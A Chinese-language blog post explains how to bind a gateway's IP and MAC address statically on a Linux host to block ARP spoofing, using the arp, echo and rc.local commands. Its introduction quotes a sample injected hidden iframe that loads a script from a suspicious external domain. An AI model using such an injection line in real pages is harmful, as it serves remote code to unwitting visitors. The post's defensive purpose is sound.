Linux獨享主機繫結IP和MAC地址，防止ARP欺騙

一隻小螞蟻吆發表於2020-04-06

一、ARP欺騙病毒，主要表現為：
中病毒的機器不僅影響自身，同時也會影響同網段的其它機器，將其它機器的HTTP資料包里加入病毒程式碼

。程式碼例子如：
<html><iframe src=http://xxx.eklajgl.com/lsj.js width=0 height=0></iframe>
這種病毒危害非常大！即使你機器的安全性做得很好，可是沒辦法保證同網段的其它機器安全沒有問題！
解決辦法：在閘道器和本機上雙向繫結IP和MAC地址，以防止ARP欺騙。

二、繫結
1、閘道器上已經對下面所帶的機器作了繫結。閘道器IP：192.168.0.1　MAC：00:02:03:18:08:00
2、要進行繫結的Unix主機IP：192.168.0.2　MAC：00:04:61:9D:8B:02

三、繫結步驟
1、先使用arp和arp -a檢視一下當前ARP快取列表
[root@ftp]# arp
Address                  HWtype HWaddress           Flags Mask            Iface
192.168.0.145            ether   00:13:20:E9:11:04   C                     eth0
192.168.0.1              ether   00:02:03:18:08:00   C                     eth0

說明：
Address：主機的IP地址
Hwtype：主機的硬體型別
Hwaddress：主機的硬體地址
Flags Mask：記錄標誌，"C"表示arp快取記憶體中的條目，"M"表示靜態的arp條目。

[root@ftp]# arp -a
(192.168.0.145) at 00:13:20:E9:11:04 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] on eth0

2、新建一個靜態的mac-->ip對應表檔案：ip-mac，將要繫結的IP和MAC地下寫入此檔案，格式為 ip mac

。
[root@ftp]# echo '192.168.0.1 00:02:03:18:08:00 ' > /etc/ip-mac
[root@ftp]# more /etc/ip-mac
192.168.0.1 00:02:03:18:08:00

3、設定開機自動繫結
[root@ftp]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local

4、手動執行一下繫結
[root@ftp]# arp -f /etc/ip-mac

5、確認繫結是否成功
[root@ftp]# arp
Address                  HWtype HWaddress           Flags Mask            Iface
192.168.0.145            ether   00:13:20:E9:11:04   C                     eth0
192.168.0.1              ether   00:02:03:18:08:00   CM                    eth0

[root@ftp]# arp -a
(192.168.0.145) at 00:02:B3:A7:85:48 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0

從繫結前後的ARP快取列表中，可以看到閘道器（192.168.0.1）的記錄標誌已經改變，說明繫結成功。

DNS欺騙和ARP欺騙是什麼？有何區別？
2023-10-10
DNS
Python寫ARP區域網主機存活掃描與ARP欺騙工具
2018-03-15
Python
Kali 實現區域網 ARP 欺騙和 ARP 攻擊
2018-09-30
ROS指令碼ip-mac繫結批次繫結ip和mac
2021-04-28
ROS指令碼Mac
網路安全測試---ARP欺騙
2022-05-23
ARP欺騙防禦工具arpon
2017-12-22
ARP獲取另一臺主機的MAC地址
2015-03-19
Mac
ARP協議地址解析協議：IP地址轉換為MAC地址
2020-09-28
協議Mac
Python 基礎練習 —— 獲取本機 Mac 地址、ip 地址和主機名
2020-04-20
PythonMac
識別主機名和IP地址
2015-09-20
WindowsServer入門系列21防範ARP欺騙
2017-11-15
WindowsServer
二十八、拒絕服務--(2)SynFlood、IP地址欺騙
2018-01-17
mysql繫結多個ip地址
2018-03-17
MySql
ip與mac繫結
2017-11-12
Mac
更改solaris IP地址和主機名(轉)
2007-08-15
IP欺騙原理與過程分析
2014-03-11
細數獨享IP和共享IP的優缺點
2022-05-16
Oracle中獲取主機名和IP地址
2018-06-27
Oracle
得到計算機的主機名和IP地址 (轉)
2007-12-04
計算機
IP欺騙技術介紹(1) (轉)
2007-08-12
IP欺騙技術介紹(2) (轉)
2007-10-11
獨享代理IP優勢有哪些？獨享代理IP三大優勢介紹
2022-05-09
IP地址和MAC地址的關係
2018-05-11
Mac
java獲取ip地址和mac地址
2011-12-29
JavaMac
網路安全之IPSG防止DHCP動態主機私自更改IP地址
2020-12-25
在cmd中獲取ip地址和主機名
2014-07-16
solaris 主機修改主機名 ip地址步驟
2010-12-20
獨享ip有哪些優勢？
2021-09-11
如何為VMware的多臺虛擬機器繫結IP地址
2018-12-24
虛擬機
什麼是獨立IP，獨立IP主機怎麼樣？
2022-07-04
香港獨立ip主機費用
2014-08-21
IP地址、子網掩碼、網路號、主機號、網路地址、主機地址
2012-11-23
什麼是IP 欺騙以及如何防範？
2022-08-17
談談IP、MAC與交換機埠繫結的方法
2017-11-15
Mac
獨享ip與共享ip的選擇技巧
2021-09-11
Java 中獲取MAC地址和IP地址
2011-03-28
JavaMac
HP-UX修改主機IP地址
2012-11-28
UX
14IP地址、主機名、域名
2024-03-25

Linux獨享主機繫結IP和MAC地址，防止ARP欺騙

相關文章